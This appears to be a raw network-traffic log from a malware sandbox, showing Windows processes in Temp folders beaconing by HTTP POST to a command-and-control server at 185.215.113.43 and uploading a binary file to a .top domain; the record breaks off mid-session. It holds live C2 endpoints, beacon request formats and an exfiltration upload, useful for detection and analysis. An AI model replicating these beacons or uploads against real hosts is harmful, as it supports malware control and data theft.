Dec 18, 2024 13:39:21.587153912 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:39:22.944232941 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:39:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.8	49795	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:39:24.578388929 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:39:26.166168928 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:39:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.8	49802	185.185.71.170	80	4412	C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:39:27.146322966 CET	12360	OUT	POST /v1/upload.php HTTP/1.1 Host: twentytk20pn.top Accept: / Content-Length: 28660 Content-Type: multipart/form-data; boundary=------------------------Q0DnxejWaMVIjocR9rZKqs Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 51 30 44 6e 78 65 6a 57 61 4d 56 49 6a 6f 63 52 39 72 5a 4b 71 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 65 64 61 70 61 78 6f 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a dc 41 6c bc c2 39 9d 2b 50 8c 75 16 91 d8 44 3f 0b 33 d5 0a bf 4e 66 f2 4e 17 70 6b 21 09 9a 31 61 b1 5e f9 89 fa 71 54 43 03 3f 24 e5 a3 d2 a1 64 1d 6f 1a 74 29 7b 30 6b fe 80 58 5f cc 84 8c df ff ba f6 bf 40 9e 1e cd df 9b 89 a1 b7 c8 4a 1e d3 5f 67 4e e5 c7 11 49 e1 75 0a 11 41 fc 28 0e 5f 88 fa 1e 26 09 77 57 a4 4b d1 82 1e eb b0 a7 c4 d6 25 e6 16 89 6e 9d 99 8c 35 42 d0 3e 1f 12 8f a7 63 cc 7e 5c d2 52 f3 ce 93 ff 72 2e 7d 7c 49 34 67 16 de 54 5e f0 46 e4 1e 8a 5d 0d f3 12 df 3b e5 fd a2 9f 80 4d fe e5 da 9f da 15 03 [TRUNCATED] Data Ascii: --------------------------Q0DnxejWaMVIjocR9rZKqsContent-Disposition: form-data; name="file"; filename="Pedapaxo.bin"Content-Type: application/octet-streamAl9+PuD?3NfNpk!1a^qTC?$dot){0kX_@J_gNIuA(_&wWK%n5B>c~\Rr.}\|I4gT^F];M7f!R50SZ5iQ')y ?on\|$i$YPsMH'vB[+,13{kC_j_[aHyY90<{_WU-#@..SQVEV9N&av6/+fte2ZlQtEDK$pb%HO~U\gJ9Pm_w$e>aKKULj 5A><pfX5ji8@.t\|/4ptx2{4 Zd8}X}p?(5@7b&d1_6sLBgC)g{E/Sqdb)%y$oxG./:@yW@fupnip5G0}\G$h)I'py\|A/3`78mE<iJPu%'YwJ\|[8o8Mc]6r)0D.##GywOo+TbG:)G:= [TRUNCATED]
Dec 18, 2024 13:39:27.266084909 CET	7416	OUT	Data Raw: c4 be 3a 06 dc 1a 9b 47 67 84 88 f0 79 72 dc 4a ae 5e 28 91 9b bf 7f 91 d1 db 15 8c 31 34 1c d3 dd b7 06 4e ed 34 a8 05 45 7f 83 13 6b 83 ca cb 50 8d 01 4e e3 95 1b 5d 7e 21 00 07 40 ef f5 a9 20 65 97 bb bd a7 c5 b1 fb d7 d6 b6 df 1b dc 3d ad f1 Data Ascii: :GgyrJ^(14N4EkPN]~!@ e=\E3x}16o"uM+}[TsF\6 LOCh:y!U[IIky\#C^n\;UO/\|1g{oZbi+W(dt;NG:
Dec 18, 2024 13:39:27.266144037 CET	2472	OUT	Data Raw: 09 1d 78 9c e0 76 28 09 97 b1 77 44 3b cd 95 81 11 65 76 73 24 a8 e2 fe 51 9e e5 db 6b 17 eb 21 08 ea 34 24 f3 30 c5 86 34 20 c4 17 fa c9 44 9e 92 37 d9 18 e4 3d d3 0a 47 e2 b4 5a 20 6f 0c d7 d1 98 7a 9c c5 39 02 20 5a 90 7e d2 a9 59 61 24 de 87 Data Ascii: xv(wD;evs$Qk!4$04 D7=GZ oz9 Z~Ya$OpE2R\vDJO>5i!0vKSh>9([ko3R`6`6-+(A2`kb3s;kzbEx'7"z>kvb
Dec 18, 2024 13:39:27.266191959 CET	2472	OUT	Data Raw: 2d b5 3c 7f 3d 9b 07 d4 b6 bc 39 1b 64 90 64 6a c9 34 51 65 a7 3b db 14 c4 4d 0b b1 9a 96 ee 82 58 7e e8 33 26 1c 50 d9 5d 78 b5 3d ba db 97 8d 51 a5 b7 75 8a 58 3b b9 32 63 a8 4c cf 9a d7 6f 04 fa e6 9e 2c 5f 1b 3b 43 00 11 ba 2e 4e 07 56 8a ce Data Ascii: -<=9ddj4Qe;MX~3&P]x=QuX;2cLo,_;C.NVb(h7'{dkc:#;=g{(as:lq.8_46}2O9bOOhZ%xb,C^-(25*]-{][E&(<3<"
Dec 18, 2024 13:39:27.266242027 CET	2472	OUT	Data Raw: f2 da 31 f8 59 c4 2c a1 cb b0 9b 50 1c 50 f4 b8 0c 6a 11 49 43 d0 dc c3 49 a9 b3 46 76 af 05 0d 80 09 1c 82 1e 05 19 0f 06 dd 7c d6 56 e9 0e 08 4d 0d dc 77 76 33 10 5b 1f 1f 58 5f d8 7d 70 75 25 ef 5f 85 84 27 73 a1 3c a2 da 0f d8 29 0a ed 09 4e Data Ascii: 1Y,PPjICIFv\|VMwv3[X_}pu%_'s<)N$Y0L5T[tg:0KMT9qt%9#<R{wm]cc~6tv8?8Fq/,8hu85*\D?E/"Z:\d7u#
Dec 18, 2024 13:39:27.266309977 CET	1652	OUT	Data Raw: 0e 14 02 00 f0 b9 4a ec c1 67 5c 73 fc 05 7b 7b fa c7 92 1d 37 62 3f c8 85 15 f3 eb 6f ac 0e a2 37 2c 8c 2a ae f9 ab 38 60 2b eb 03 de b1 f0 ad ba 71 5b 7e 7a 3b 22 6b 06 f2 d7 68 09 f7 2b 30 0c ab 09 e5 35 9a e5 1c c0 c5 72 04 89 28 52 58 7f 5d Data Ascii: Jg\s{{7b?o7,8`+q[~z;"kh+05r(RX]GIQ1:Lf~?Wx96?FLETIE+GQE?VM@U=9nj^SR9[I`{N]h;3A7L`V3{V6_i
Dec 18, 2024 13:39:28.696050882 CET	255	IN	HTTP/1.1 200 OK server: nginx date: Wed, 18 Dec 2024 12:39:28 GMT content-type: text/plain; charset=utf-8 content-length: 2 x-ratelimit-limit: 30 x-ratelimit-remaining: 27 x-ratelimit-reset: 1734527357 etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.8	49803	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:39:27.920360088 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:39:29.254107952 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:39:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.8	49810	185.185.71.170	80	4412	C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:39:30.334244967 CET	199	OUT	POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1 Host: home.twentytk20pn.top Accept: / Content-Type: application/json Content-Length: 56 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 4a 53 46 64 73 59 70 4e 41 79 4b 75 75 4d 4a 45 31 37 33 34 35 32 35 35 32 39 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 32 22 20 7d Data Ascii: { "id1": "JSFdsYpNAyKuuMJE1734525529", "data": "Done2" }
Dec 18, 2024 13:39:31.603394032 CET	141	IN	HTTP/1.1 200 OK server: nginx/1.22.1 date: Wed, 18 Dec 2024 12:39:31 GMT content-type: text/html; charset=utf-8 content-length: 4 Data Raw: 6f 6b 61 79 Data Ascii: okay

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.8	49812	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:39:30.905759096 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:39:32.332212925 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:39:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.8	49823	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:39:34.211289883 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:39:35.537391901 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:39:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.8	49829	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:39:37.226531982 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:39:38.537967920 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:39:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.8	49840	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:39:40.321697950 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:39:41.624193907 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:39:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.8	49846	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:39:43.263453007 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:39:44.600436926 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:39:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.8	49857	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:39:46.379270077 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:39:47.710469961 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:39:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.8	49862	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:39:49.792558908 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:39:51.138493061 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:39:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.8	49868	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:39:53.312688112 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:39:54.658135891 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:39:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.8	49879	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:39:56.307246923 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:39:57.658824921 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:39:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.8	49885	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:39:59.429213047 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:40:00.772185087 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:40:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.8	49891	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:40:02.407403946 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:40:03.760304928 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:40:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.8	49897	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:40:05.560947895 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:40:06.896872997 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:40:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.8	49903	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:40:08.535458088 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:40:09.938158989 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:40:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.8	49914	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:40:11.772808075 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:40:13.131151915 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:40:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.8	49920	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
